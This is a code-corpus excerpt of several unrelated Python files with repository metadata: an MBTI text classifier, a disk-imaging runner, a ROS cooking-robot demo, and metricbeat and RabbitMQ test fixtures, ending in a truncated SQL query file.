print("%s of %s rows" % (i, len_data))
##### Remove and clean comments
posts = row[1].posts
temp = re.sub('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', ' ', posts)
temp = re.sub("[^a-zA-Z]", " ", temp)
temp = re.sub(' +', ' ', temp).lower()
if remove_stop_words:
temp = " ".join([lemmatiser.lemmatize(w) for w in temp.split(' ') if w not in cachedStopWords])
else:
temp = " ".join([lemmatiser.lemmatize(w) for w in temp.split(' ')])
if remove_mbti_profiles:
for t in unique_type_list:
temp = temp.replace(t,"")
type_labelized = translate_personality(row[1].type)
list_personality.append(type_labelized)
list_posts.append(temp)
list_posts = np.array(list_posts)
list_personality = np.array(list_personality)
return list_posts, list_personality
# read data
# data = pd.read_csv('/Users/jongphilkim/Desktop/Django_WEB/essayfitaiproject_2020_12_09/essayai/mbti_1.csv')
data = pd.read_csv('./mbti/mbti_1.csv')
# Apply the get_types function
data = data.join(data.apply (lambda row: get_types (row),axis=1))
# load
with open('./mbti/list_posts.pickle', 'rb') as f:
list_posts = pickle.load(f)
# load
with open('./mbti/list_personality.pickle', 'rb') as f:
list_personality = pickle.load(f)
# # Posts to a matrix of token counts
cntizer = CountVectorizer(analyzer="word",
max_features=1500,
tokenizer=None,
preprocessor=None,
stop_words=None,
max_df=0.7,
min_df=0.1)
# Learn the vocabulary dictionary and return term-document matrix
print("CountVectorizer...")
X_cnt = cntizer.fit_transform(list_posts)
#################################################
#save!!! model X_cnt
import pickle
# save
# with open('./essayai/ai_character/mbti/data_X_cnt.pickle', 'wb') as f:
# pickle.dump(X_cnt, f, pickle.HIGHEST_PROTOCOL)
# load
with open('./mbti/data_X_cnt.pickle', 'rb') as f:
X_cnt = pickle.load(f)
#################################################
# Transform the count matrix to a normalized tf or tf-idf representation
tfizer = TfidfTransformer()
print("Tf-idf...")
# Learn the idf vector (fit) and transform a count matrix to a tf-idf representation
X_tfidf = tfizer.fit_transform(X_cnt).toarray()
# load
with open('./mbti/data.pickle', 'rb') as f:
X_tfidf = pickle.load(f)
def mbti_classify(text):
type_indicators = [ "IE: Introversion (I) / Extroversion (E)", "NS: Intuition (N) – Sensing (S)",
"FT: Feeling (F) - Thinking (T)", "JP: Judging (J) – Perceiving (P)" ]
# Posts in tf-idf representation
X = X_tfidf
my_posts = str(text)
# The type is just a dummy so that the data prep function can be reused
mydata = pd.DataFrame(data={'type': ['INFJ'], 'posts': [my_posts]})
my_posts, dummy = pre_process_data(mydata, remove_stop_words=True)
my_X_cnt = cntizer.transform(my_posts)
my_X_tfidf = tfizer.transform(my_X_cnt).toarray()
# setup parameters for xgboost
param = {}
param['n_estimators'] = 200
param['max_depth'] = 2
param['nthread'] = 8
param['learning_rate'] = 0.2
result = []
# Let's train type indicator individually
for l in range(len(type_indicators)):
print("%s ..." % (type_indicators[l]))
Y = list_personality[:,l]
# split data into train and test sets
seed = 7
test_size = 0.33
X_train, X_test, y_train, y_test = train_test_split(X, Y, test_size=test_size, random_state=seed)
# fit model on training data
model = XGBClassifier(**param)
model.fit(X_train, y_train)
# make predictions for my data
y_pred = model.predict(my_X_tfidf)
result.append(y_pred[0])
# print("* %s prediction: %s" % (type_indicators[l], y_pred))
print("The result is: ", translate_back(result))
# Collect the result letters into a list
Result_list = list(translate_back(result))
# Print the description for each letter of the MBTI result
# read data
# data = pd.read_csv('/Users/jongphilkim/Desktop/Django_WEB/essayfitaiproject/essayai/mbti_exp.csv')
data = pd.read_csv('./mbti/mbti_exp.csv')
# Create a new DataFrame to hold the computed values
df2 = pd.DataFrame(index=range(0,4),columns=['Type', 'Explain'])
# Look up each letter from the list and print the matching DataFrame row
for i in range(0, len(Result_list)):
type = Result_list[i]
for j in range(0, len(data)):
if type == data.iloc[j,0]:
break
is_mbti = data.iloc[j,2]
df2.iloc[i, [0,1]] = [type, is_mbti]
print(df2)
return df2
# my_posts = """Describe a place or environment where you are perfectly content. What do you do or experience there, and why is it meaningful to you? 644 words out of 650 Gettysburg, a small town in the middle of Pennsylvania, was the sight of the largest, bloodiest battle in the Civil War. Something about these hallowed grounds draws me back every year for a three day camping trip with my family over Labor Day weekend. Every year, once school starts, I count the days until I take that three and half hour drive from Pittsburgh to Gettysburg. Each year, we leave after school ends on Friday and arrive in Gettysburg with just enough daylight to pitch the tents and cook up a quick dinner on the campfire. As more of the extended family arrives, we circle around the campfire and find out what is new with everyone. The following morning, everyone is up by nine and helping to make breakfast which is our best meal of the day while camping. Breakfast will fuel us for the day as we hike the vast battlefields. My Uncle Mark, my twin brother, Andrew, and I like to take charge of the family tour since we have the most passion and knowledge about the battle. I have learned so much from the stories Mark tells us while walking on the tours. Through my own research during these last couple of trips, I did some of the explaining about the events that occurred during the battle 150 years ago. My fondest experience during one trip was when we decided to go off of the main path to find a carving in a rock from a soldier during the battle. Mark had read about the carving in one of his books about Gettysburg, and we were determined to locate it. After almost an hour of scanning rocks in the area, we finally found it with just enough daylight to read what it said. After a long day of exploring the battlefield, we went back to the campsite for some 'civil war' stew. There is nothing special about the stew, just meat, vegetables and gravy, but for whatever reason, it is some of the best stew I have ever eaten. For the rest of the night, we enjoy the company of our extended family. My cousins, my brother and I listen to the stories from Mark and his friends experiences' in the military. After the parents have gone to bed, we stay up talking with each other, inching closer and closer to the fire as it gets colder. Finally, we creep back into our tents, trying to be as quiet as possible to not wake our parents. The next morning we awake red-eyed from the lack of sleep and cook up another fantastic breakfast. Unfortunately, after breakfast we have to pack up and head back to Pittsburgh. It will be another year until I visit Gettysburg again. There is something about that time I spend in Gettysburg that keeps me coming back to visit. For one, it is just a fun, relaxing time I get to spend with my family. This trip also fulfills my love for the outdoors. From sitting by the campfire and falling asleep to the chirp of the crickets, that is my definition of a perfect weekend. Gettysburg is also an interesting place to go for Civil War buffs like me. While walking down the Union line or walking Pickett's Charge, I imagine how the battle would have been played out around me. Every year when I visit Gettysburg, I learn more facts and stories about the battle, soldiers and generally about the Civil War. While I am in Gettysburg, I am perfectly content, passionate about the history and just enjoying the great outdoors with my family.
# This drive to learn goes beyond just my passion for history but applies to all of the math, science and business classes I have taken and clubs I am involved in at school. Every day, I am genuinely excited to learn.
# """
# test = mbti_classify(my_posts)
# print ('check')
# test
# print ('check2')
| 41.625455 | 3,675 | 0.653621 | 1,750 | 11,447 | 4.194286 | 0.326857 | 0.006812 | 0.00327 | 0.007084 | 0.107493 | 0.070845 | 0.06049 | 0.053951 | 0.053951 | 0.053951 | 0 | 0.011976 | 0.241373 | 11,447 | 275 | 3,676 | 41.625455 | 0.833026 | 0.451909 | 0 | 0.042553 | 0 | 0.007092 | 0.111929 | 0.024987 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035461 | false | 0 | 0.156028 | 0.007092 | 0.22695 | 0.070922 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
effective: 0 | hits: 1
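The binary encoding used throughout the file is easiest to see in isolation. This restates `translate_personality`/`translate_back` with their lookup tables so the round trip can be run without the CSV and pickle inputs the full script expects:

```python
b_Pers = {'I': 0, 'E': 1, 'N': 0, 'S': 1, 'F': 0, 'T': 1, 'J': 0, 'P': 1}
b_Pers_list = [{0: 'I', 1: 'E'}, {0: 'N', 1: 'S'},
               {0: 'F', 1: 'T'}, {0: 'J', 1: 'P'}]

def translate_personality(personality):
    # 'ENTP' -> [1, 0, 1, 1]
    return [b_Pers[l] for l in personality]

def translate_back(personality):
    # [1, 0, 1, 1] -> 'ENTP'
    return ''.join(b_Pers_list[i][l] for i, l in enumerate(personality))

assert translate_personality('ENTP') == [1, 0, 1, 1]
assert translate_back([1, 0, 1, 1]) == 'ENTP'
```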
hexsha: 6ac1a5f132a19c0dca01d22ddfd3613255dba8b5 | size: 4,258 | ext: py | lang: Python
max_stars: path=wce_triage/ops/create_image_runner.py | repo=pfrouleau/wce-triage-v2 | head=25610cda55f5cb2170e13e121ae1cbaa92ef7626 | licenses=["MIT"] | count=3 | events=2019-07-25T03:24:23.000Z to 2021-06-23T14:01:34.000Z
max_issues: path=wce_triage/ops/create_image_runner.py | repo=pfrouleau/wce-triage-v2 | head=25610cda55f5cb2170e13e121ae1cbaa92ef7626 | licenses=["MIT"] | count=1 | events=2019-12-20T16:04:19.000Z to 2019-12-20T16:04:19.000Z
max_forks: path=wce_triage/ops/create_image_runner.py | repo=pfrouleau/wce-triage-v2 | head=25610cda55f5cb2170e13e121ae1cbaa92ef7626 | licenses=["MIT"] | count=2 | events=2019-07-25T03:24:26.000Z to 2021-02-14T05:27:11.000Z
content:
#!/usr/bin/env python3
#
# Create disk image
#
import re, sys, traceback
from .tasks import task_fetch_partitions, task_refresh_partitions, task_mount, task_remove_persistent_rules, task_remove_logs, task_fsck, task_shrink_partition, task_expand_partition, task_unmount
from .partclone_tasks import task_create_disk_image
from .ops_ui import console_ui
from ..components.disk import create_storage_instance
from .runner import Runner
from ..lib.disk_images import make_disk_image_name
from .json_ui import json_ui
from ..lib.util import init_triage_logger, is_block_device
# "Waiting", "Prepare", "Preflight", "Running", "Success", "Failed"]
my_messages = { "Waiting": "Saving disk is waiting.",
"Prepare": "Saving disk is preparing.",
"Preflight": "Saving disk is preparing.",
"Running": "{step} of {steps}: Running {task}",
"Success": "Saving disk completed successfully.",
"Failed": "Saving disk failed." }
#
class ImageDiskRunner(Runner):
'''Runner for creating a disk image: runs fsck, shrinks the partition, creates
the disk image, and resizes the file system back to the maximum.
For now, this is only dealing with the EXT4 linux partition.
'''
# FIXME: If I want to make this to a generic clone app, I need to deal with all of partitions on the disk.
# One step at a time.
def __init__(self, ui, runner_id, disk, destdir, suggestedname=None, partition_id='Linux'):
super().__init__(ui, runner_id)
self.time_estimate = 600
self.disk = disk
self.partition_id = partition_id
self.destdir = destdir
self.imagename = make_disk_image_name(destdir, suggestedname)
pass
def prepare(self):
super().prepare()
# self.tasks.append(task_mount_nfs_destination(self, "Mount the destination volume"))
self.tasks.append(task_fetch_partitions("Fetch partitions", self.disk))
self.tasks.append(task_refresh_partitions("Refresh partition information", self.disk))
self.tasks.append(task_mount("Mount the target disk", disk=self.disk, partition_id=self.partition_id))
self.tasks.append(task_remove_persistent_rules("Remove persistent rules", disk=self.disk, partition_id=self.partition_id))
self.tasks.append(task_remove_logs("Remove/Clean Logs", disk=self.disk, partition_id=self.partition_id))
task = task_unmount("Unmount target", disk=self.disk, partition_id=self.partition_id)
task.set_teardown_task()
self.tasks.append(task)
self.tasks.append(task_fsck("fsck partition", disk=self.disk, partition_id=self.partition_id))
self.tasks.append(task_shrink_partition("Shrink partition to smallest", disk=self.disk, partition_id=self.partition_id))
self.tasks.append(task_create_disk_image("Create disk image", disk=self.disk, partition_id=self.partition_id, imagename=self.imagename))
task = task_expand_partition("Expand the partion back", disk=self.disk, partition_id=self.partition_id)
task.set_teardown_task()
self.tasks.append(task)
pass
pass
if __name__ == "__main__":
tlog = init_triage_logger()
if len(sys.argv) == 1:
print( 'Unloader: devicename part destdir')
sys.exit(0)
# NOTREACHED
pass
devname = sys.argv[1]
if not is_block_device(devname):
print( '%s is not a block device.' % devname)
sys.exit(1)
# NOTREACHED
pass
part = sys.argv[2] # This is a partition id
destdir = sys.argv[3] # Destination directory
disk = create_storage_instance(devname)
# Preflight is for me to see the tasks. http server runs this with json_ui.
do_it = True
if destdir == "preflight":
ui = console_ui()
do_it = False
pass
elif destdir == "testflight":
ui = console_ui()
do_it = True
pass
else:
ui = json_ui(wock_event="saveimage", message_catalog=my_messages)
pass
if re.match(r'\d+', part):
part = int(part)
pass
runner_id = disk.device_name
runner = ImageDiskRunner(ui, runner_id, disk, destdir, partition_id=part)
try:
runner.prepare()
runner.preflight()
runner.explain()
runner.run()
sys.exit(0)
# NOTREACHED
except Exception as exc:
sys.stderr.write(traceback.format_exc(exc) + "\n")
sys.exit(1)
# NOTREACHED
pass
pass
| 35.190083 | 196 | 0.711837 | 593 | 4,258 | 4.903879 | 0.284992 | 0.079436 | 0.067056 | 0.071871 | 0.237276 | 0.18088 | 0.162311 | 0.162311 | 0.149243 | 0.134801 | 0 | 0.003726 | 0.180601 | 4,258 | 120 | 197 | 35.483333 | 0.829751 | 0.155707 | 0 | 0.27381 | 0 | 0 | 0.142457 | 0 | 0 | 0 | 0 | 0.008333 | 0 | 1 | 0.02381 | false | 0.130952 | 0.107143 | 0 | 0.142857 | 0.02381 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 |
effective: 0 | hits: 1
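`is_block_device` is imported from `wce_triage.lib.util`, which is not part of this record; a hedged standalone equivalent using only the standard library would look like this:

```python
import os
import stat

def is_block_device(path):
    """Return True if path exists and is a block device (e.g. /dev/sda)."""
    try:
        return stat.S_ISBLK(os.stat(path).st_mode)
    except FileNotFoundError:
        return False

print(is_block_device('/dev/sda'))  # True on a typical Linux host
print(is_block_device('/tmp'))      # False: a directory, not a device
```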
hexsha: 6ac3173f834c06ec5469554b76a1d8e391432cee | size: 5,171 | ext: py | lang: Python
max_stars: path=demos/chicken_pasta/chicken_pasta.py | repo=icaros-usc/wecook | head=27bbb6b78a48e04765a87d33cc8a5d3748d2d4cc | licenses=["BSD-3-Clause"] | count=15 | events=2019-09-15T05:24:19.000Z to 2021-02-26T20:31:19.000Z
max_issues: path=demos/chicken_pasta/chicken_pasta.py | repo=icaros-usc/wecook | head=27bbb6b78a48e04765a87d33cc8a5d3748d2d4cc | licenses=["BSD-3-Clause"] | count=16 | events=2019-10-10T23:27:00.000Z to 2020-05-14T02:30:56.000Z
max_forks: path=demos/chicken_pasta/chicken_pasta.py | repo=icaros-usc/wecook | head=27bbb6b78a48e04765a87d33cc8a5d3748d2d4cc | licenses=["BSD-3-Clause"] | count=2 | events=2020-02-01T16:31:29.000Z to 2020-04-07T21:00:04.000Z
content:
#!/usr/bin/env python3
import rospy
from wecook.msg import ActionMsg, TaskMsg, SceneMsg, ObjectMsg, ContainingMsg, AgentMsg
def talker():
pub = rospy.Publisher('WeCookDispatch', TaskMsg, queue_size=10)
rospy.init_node('wecook_chicken_pasta', anonymous=True)
scene_msg = SceneMsg([ObjectMsg('wall0',
'package://wecook_assets/data/furniture/wall.urdf',
[0.75, 0.05, 0., 0., 0., 0., 1.]),
ObjectMsg('wall1',
'package://wecook_assets/data/furniture/wall.urdf',
[-0.85, 1.45, 0., 0., 0., 0.707, 0.707]),
ObjectMsg('counter0',
'package://wecook_assets/data/furniture/kitchen_counter.urdf',
[0.3, 0., 0., 0., 0., 0., 1.]),
ObjectMsg('counter1',
'package://wecook_assets/data/furniture/kitchen_counter.urdf',
[0., 1.0, 0., 0., 0., 0.707, 0.707]),
ObjectMsg('sink0',
'package://wecook_assets/data/furniture/sink_counter.urdf',
[-1.3, 1.05, 0., 0., 0., 0.707, 0.707]),
ObjectMsg('shelf0',
'package://wecook_assets/data/furniture/bookcase.urdf',
[0.3, -1.05, 0., 0., 0., 0., 1.]),
ObjectMsg('stove0',
'package://wecook_assets/data/objects/stove.urdf',
[-0.35, 0.95, 0.75, 0., 0., 0., 1.]),
ObjectMsg('pot0',
'package://wecook_assets/data/objects/cooking_pot.urdf',
[0.35, 1.1, 0.75, 0., 0., 0., 1.]),
ObjectMsg('skillet0',
'package://wecook_assets/data/objects/skillet.urdf',
[0.3, 0.7, 0.75, 0., 0., -0.707, .707]),
ObjectMsg('cutting_board0',
'package://wecook_assets/data/objects/cutting_board.urdf',
[0.3, -0.3, 0.75, 0., 0., 0., 1.]),
ObjectMsg('knife0',
'package://wecook_assets/data/objects/knife_big.urdf',
[0.215, -0.55, 0.775, 0., 0., 0., 1.]),
ObjectMsg('plate0',
'package://wecook_assets/data/objects/plate.urdf',
[0.3, 0.075, 0.75, 0., 0., 0., 1.]),
ObjectMsg('bowl0',
'package://wecook_assets/data/objects/bowl_green.urdf',
[0.45, 0.375, 0.75, 0., 0., 0., 1.]),
ObjectMsg('bowl1',
'package://wecook_assets/data/objects/bowl_green.urdf',
[0.15, 0.375, 0.75, 0., 0., 0., 1.]),
ObjectMsg('oil0',
'package://wecook_assets/data/objects/olive_oil.urdf',
[0., 1.15, 0.75, 0., 0., 0.707, 0.707]),
ObjectMsg('salt0',
'package://wecook_assets/data/objects/salt.urdf',
[0., 1.0, 0.75, 0., 0., 0.707, 0.707]),
ObjectMsg('pepper0',
'package://wecook_assets/data/objects/black_pepper.urdf',
[0., 0.9, 0.75, 0., 0., 0.707, 0.707]),
ObjectMsg('chicken0',
'package://wecook_assets/data/food/chicken.urdf',
[0.3, 0.075, 0.757, 0., 0., 0., 1.]),
ObjectMsg('lime0',
'package://wecook_assets/data/food/lime.urdf',
[0.3, -0.3, 0.757, 0., 0., 0., 1.]),
ObjectMsg('pasta0',
'package://wecook_assets/data/food/pasta.urdf',
[0.45, 0.375, 0.757, 0., 0., 0., 1.])],
[ContainingMsg(['plate0', 'chicken0']),
ContainingMsg(['bowl0', 'pasta0'])])
task_msg = TaskMsg(scene_msg,
[ActionMsg(['p1'], 'cut', ['plate0'], 'knife0', ['lime0'])],
[AgentMsg('p1', 'r', [0., 0., 0.75, 0., 0., 0., 0.])],
"",
"",
"follow",
"RRTConnect",
False)
# sleep briefly so the publisher is registered before sending
rospy.sleep(1)
pub.publish(task_msg)
if __name__ == '__main__':
try:
talker()
except rospy.ROSInterruptException:
pass
| 55.010638 | 98 | 0.375169 | 482 | 5,171 | 3.927386 | 0.242739 | 0.058109 | 0.049128 | 0.243001 | 0.58056 | 0.349709 | 0.303222 | 0.231379 | 0.156366 | 0 | 0 | 0.11743 | 0.47631 | 5,171 | 93 | 99 | 55.602151 | 0.58161 | 0.010056 | 0 | 0.097561 | 0 | 0 | 0.243502 | 0.197772 | 0 | 0 | 0 | 0 | 0 | 1 | 0.012195 | false | 0.012195 | 0.02439 | 0 | 0.036585 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
effective: 0 | hits: 1
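Each pose array above appears to be `[x, y, z]` followed by a quaternion `[qx, qy, qz, qw]`, which is why identity-orientation objects end in `0., 0., 0., 1.` and the rotated ones in `0.707, 0.707`. A quick check of that value (plain math, independent of ROS):

```python
import math

def yaw_to_quaternion(yaw):
    """(qx, qy, qz, qw) for a rotation of `yaw` radians about the z axis."""
    return (0.0, 0.0, math.sin(yaw / 2.0), math.cos(yaw / 2.0))

print(yaw_to_quaternion(math.pi / 2))  # (0.0, 0.0, 0.7071..., 0.7071...)
```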
hexsha: 6ac3c0aa131a8fbf4b061367a8fbb2e23790a4c8 | size: 3,777 | ext: py | lang: Python
max_stars: path=metricbeat/module/postgresql/test_postgresql.py | repo=SHolzhauer/beats | head=39679a536a22e8a0d7534a2475504488909d19fd | licenses=["ECL-2.0", "Apache-2.0"] | count=4 | events=2020-11-17T06:29:30.000Z to 2021-08-08T11:56:01.000Z
max_issues: path=metricbeat/module/postgresql/test_postgresql.py | repo=SHolzhauer/beats | head=39679a536a22e8a0d7534a2475504488909d19fd | licenses=["ECL-2.0", "Apache-2.0"] | count=36 | events=2021-02-02T14:18:40.000Z to 2022-03-20T15:07:30.000Z
max_forks: path=metricbeat/module/postgresql/test_postgresql.py | repo=SHolzhauer/beats | head=39679a536a22e8a0d7534a2475504488909d19fd | licenses=["ECL-2.0", "Apache-2.0"] | count=6 | events=2021-03-10T05:38:32.000Z to 2021-08-16T13:11:19.000Z
content:
import metricbeat
import os
import pytest
import sys
import unittest
class Test(metricbeat.BaseTest):
COMPOSE_SERVICES = ['postgresql']
def common_checks(self, output):
# Ensure no errors or warnings exist in the log.
self.assert_no_logged_warnings()
for evt in output:
top_level_fields = metricbeat.COMMON_FIELDS + ["postgresql"]
self.assertCountEqual(self.de_dot(top_level_fields), evt.keys())
self.assert_fields_are_documented(evt)
def get_hosts(self):
username = "postgres"
host = self.compose_host()
dsn = "postgres://{}?sslmode=disable".format(host)
return (
[dsn],
username,
os.getenv("POSTGRESQL_PASSWORD"),
)
@unittest.skipUnless(metricbeat.INTEGRATION_TESTS, "integration test")
@pytest.mark.tag('integration')
def test_activity(self):
"""
PostgreSQL module outputs an event.
"""
hosts, username, password = self.get_hosts()
self.render_config_template(modules=[{
"name": "postgresql",
"metricsets": ["activity"],
"hosts": hosts,
"username": username,
"password": password,
"period": "5s"
}])
proc = self.start_beat()
self.wait_until(lambda: self.output_lines() > 0)
proc.check_kill_and_wait()
output = self.read_output_json()
self.common_checks(output)
for evt in output:
assert "name" in evt["postgresql"]["activity"]["database"]
assert "oid" in evt["postgresql"]["activity"]["database"]
assert "state" in evt["postgresql"]["activity"]
@unittest.skipUnless(metricbeat.INTEGRATION_TESTS, "integration test")
@pytest.mark.tag('integration')
def test_database(self):
"""
PostgreSQL module outputs an event.
"""
hosts, username, password = self.get_hosts()
self.render_config_template(modules=[{
"name": "postgresql",
"metricsets": ["database"],
"hosts": hosts,
"username": username,
"password": password,
"period": "5s"
}])
proc = self.start_beat()
self.wait_until(lambda: self.output_lines() > 0)
proc.check_kill_and_wait()
output = self.read_output_json()
self.common_checks(output)
for evt in output:
assert "name" in evt["postgresql"]["database"]
assert "oid" in evt["postgresql"]["database"]
assert "blocks" in evt["postgresql"]["database"]
assert "rows" in evt["postgresql"]["database"]
assert "conflicts" in evt["postgresql"]["database"]
assert "deadlocks" in evt["postgresql"]["database"]
@unittest.skipUnless(metricbeat.INTEGRATION_TESTS, "integration test")
@pytest.mark.tag('integration')
def test_bgwriter(self):
"""
PostgreSQL module outputs an event.
"""
hosts, username, password = self.get_hosts()
self.render_config_template(modules=[{
"name": "postgresql",
"metricsets": ["bgwriter"],
"hosts": hosts,
"username": username,
"password": password,
"period": "5s"
}])
proc = self.start_beat()
self.wait_until(lambda: self.output_lines() > 0)
proc.check_kill_and_wait()
output = self.read_output_json()
self.common_checks(output)
for evt in output:
assert "checkpoints" in evt["postgresql"]["bgwriter"]
assert "buffers" in evt["postgresql"]["bgwriter"]
assert "stats_reset" in evt["postgresql"]["bgwriter"]
| 32.843478 | 76 | 0.581943 | 380 | 3,777 | 5.626316 | 0.247368 | 0.028064 | 0.084191 | 0.064546 | 0.697381 | 0.623012 | 0.579046 | 0.579046 | 0.579046 | 0.579046 | 0 | 0.00224 | 0.290707 | 3,777 | 114 | 77 | 33.131579 | 0.795819 | 0.041038 | 0 | 0.556818 | 0 | 0 | 0.182432 | 0.008164 | 0 | 0 | 0 | 0 | 0.170455 | 1 | 0.056818 | false | 0.079545 | 0.056818 | 0 | 0.147727 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 |
effective: 0 | hits: 1
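`get_hosts` assembles a standard libpq connection URI. Outside the metricbeat harness the same DSN can be handed to any PostgreSQL driver; the psycopg2 call below is an assumption for illustration, not something the test itself does:

```python
import os
import psycopg2  # assumed driver; any libpq-compatible client works

host = 'localhost:5432'  # stand-in for self.compose_host()
dsn = 'postgres://{}?sslmode=disable'.format(host)

conn = psycopg2.connect(dsn, user='postgres',
                        password=os.getenv('POSTGRESQL_PASSWORD'))
with conn.cursor() as cur:
    cur.execute('SELECT state FROM pg_stat_activity LIMIT 1')
    print(cur.fetchone())  # e.g. ('active',)
```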
hexsha: 6ac4ca9b00a8492410dc6166ad36ac8d64fdcffc | size: 2,337 | ext: py | lang: Python
max_stars: path=rabbitmq/tests/common.py | repo=jfmyers9/integrations-core | head=8793c784f1d5b2c9541b2dd4214dd91584793ced | licenses=["BSD-3-Clause"] | count=1 | events=2021-03-24T13:00:14.000Z to 2021-03-24T13:00:14.000Z
max_issues: path=rabbitmq/tests/common.py | repo=jfmyers9/integrations-core | head=8793c784f1d5b2c9541b2dd4214dd91584793ced | licenses=["BSD-3-Clause"] | count=null | events=null
max_forks: path=rabbitmq/tests/common.py | repo=jfmyers9/integrations-core | head=8793c784f1d5b2c9541b2dd4214dd91584793ced | licenses=["BSD-3-Clause"] | count=null | events=null
content:
# (C) Datadog, Inc. 2018-present
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
import os
from packaging import version
from datadog_checks.base.utils.common import get_docker_hostname
HERE = os.path.dirname(os.path.abspath(__file__))
ROOT = os.path.dirname(os.path.dirname(HERE))
RABBITMQ_VERSION_RAW = os.environ['RABBITMQ_VERSION']
RABBITMQ_VERSION = version.parse(RABBITMQ_VERSION_RAW)
CHECK_NAME = 'rabbitmq'
HOST = get_docker_hostname()
PORT = 15672
URL = 'http://{}:{}/api/'.format(HOST, PORT)
CONFIG = {
'rabbitmq_api_url': URL,
'rabbitmq_user': 'guest',
'rabbitmq_pass': 'guest',
'queues': ['test1'],
'tags': ["tag1:1", "tag2"],
'exchanges': ['test1'],
}
CONFIG_NO_NODES = {
'rabbitmq_api_url': URL,
'rabbitmq_user': 'guest',
'rabbitmq_pass': 'guest',
'queues': ['test1'],
'tags': ["tag1:1", "tag2"],
'exchanges': ['test1'],
'collect_node_metrics': False,
}
CONFIG_REGEX = {
'rabbitmq_api_url': URL,
'rabbitmq_user': 'guest',
'rabbitmq_pass': 'guest',
'queues_regexes': [r'test\d+'],
'exchanges_regexes': [r'test\d+'],
}
CONFIG_VHOSTS = {
'rabbitmq_api_url': URL,
'rabbitmq_user': 'guest',
'rabbitmq_pass': 'guest',
'vhosts': ['/', 'myvhost'],
}
CONFIG_WITH_FAMILY = {
'rabbitmq_api_url': URL,
'rabbitmq_user': 'guest',
'rabbitmq_pass': 'guest',
'tag_families': True,
'queues_regexes': [r'(test)\d+'],
'exchanges_regexes': [r'(test)\d+'],
}
CONFIG_DEFAULT_VHOSTS = {
'rabbitmq_api_url': URL,
'rabbitmq_user': 'guest',
'rabbitmq_pass': 'guest',
'vhosts': ['/', 'test'],
}
CONFIG_TEST_VHOSTS = {
'rabbitmq_api_url': URL,
'rabbitmq_user': 'guest',
'rabbitmq_pass': 'guest',
'vhosts': ['test', 'test2'],
}
EXCHANGE_MESSAGE_STATS = {
'ack': 1.0,
'ack_details': {'rate': 1.0},
'confirm': 1.0,
'confirm_details': {'rate': 1.0},
'deliver_get': 1.0,
'deliver_get_details': {'rate': 1.0},
'publish': 1.0,
'publish_details': {'rate': 1.0},
'publish_in': 1.0,
'publish_in_details': {'rate': 1.0},
'publish_out': 1.0,
'publish_out_details': {'rate': 1.0},
'return_unroutable': 1.0,
'return_unroutable_details': {'rate': 1.0},
'redeliver': 1.0,
'redeliver_details': {'rate': 1.0},
}
| 23.606061 | 64 | 0.618314 | 291 | 2,337 | 4.694158 | 0.323024 | 0.023426 | 0.070278 | 0.076135 | 0.489751 | 0.418009 | 0.418009 | 0.418009 | 0.418009 | 0.418009 | 0 | 0.027749 | 0.182713 | 2,337 | 98 | 65 | 23.846939 | 0.687435 | 0.046213 | 0 | 0.341772 | 0 | 0 | 0.402247 | 0.011236 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.088608 | 0.037975 | 0 | 0.037975 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 |
effective: 0 | hits: 1
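These fixtures point the Datadog check at RabbitMQ's HTTP management API. For a sense of what the check consumes, the same endpoint can be queried directly; the `requests` call is an illustrative assumption, not how the integration itself is wired:

```python
import requests

from common import CONFIG  # the fixture module above

resp = requests.get(CONFIG['rabbitmq_api_url'] + 'overview',
                    auth=(CONFIG['rabbitmq_user'], CONFIG['rabbitmq_pass']))
resp.raise_for_status()
print(resp.json()['rabbitmq_version'])
```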
hexsha: 6ac55faf90a367de65f30a569842061f13204e0c | size: 2,952 | ext: py | lang: Python
max_stars: path=module1-introduction-to-sql/query.py | repo=jrslagle/DS-Unit-3-Sprint-2-SQL-and-Databases | head=8a6b3fd14b6a6833ee3a14b2d8a7db3bee494a14 | licenses=["MIT"] | count=null | events=null
max_issues: path=module1-introduction-to-sql/query.py | repo=jrslagle/DS-Unit-3-Sprint-2-SQL-and-Databases | head=8a6b3fd14b6a6833ee3a14b2d8a7db3bee494a14 | licenses=["MIT"] | count=null | events=null
max_forks: path=module1-introduction-to-sql/query.py | repo=jrslagle/DS-Unit-3-Sprint-2-SQL-and-Databases | head=8a6b3fd14b6a6833ee3a14b2d8a7db3bee494a14 | licenses=["MIT"] | count=null | events=null
content:
# Look at the charactercreator_character table
# GET_CHARACTERS = """
# SELECT *
# FROM charactercreator_character;
# """
# How many total Characters are there? (302)
TOTAL_CHARACTERS = """
SELECT COUNT(*) as number_of_characters
FROM charactercreator_character;
"""
# How many of each specific subclass?
# TOTAL_SUBCLASS = """
# SELECT
# (SELECT COUNT(*) FROM charactercreator_necromancer) AS necros,
# (SELECT COUNT(*) FROM charactercreator_mage) AS mages,
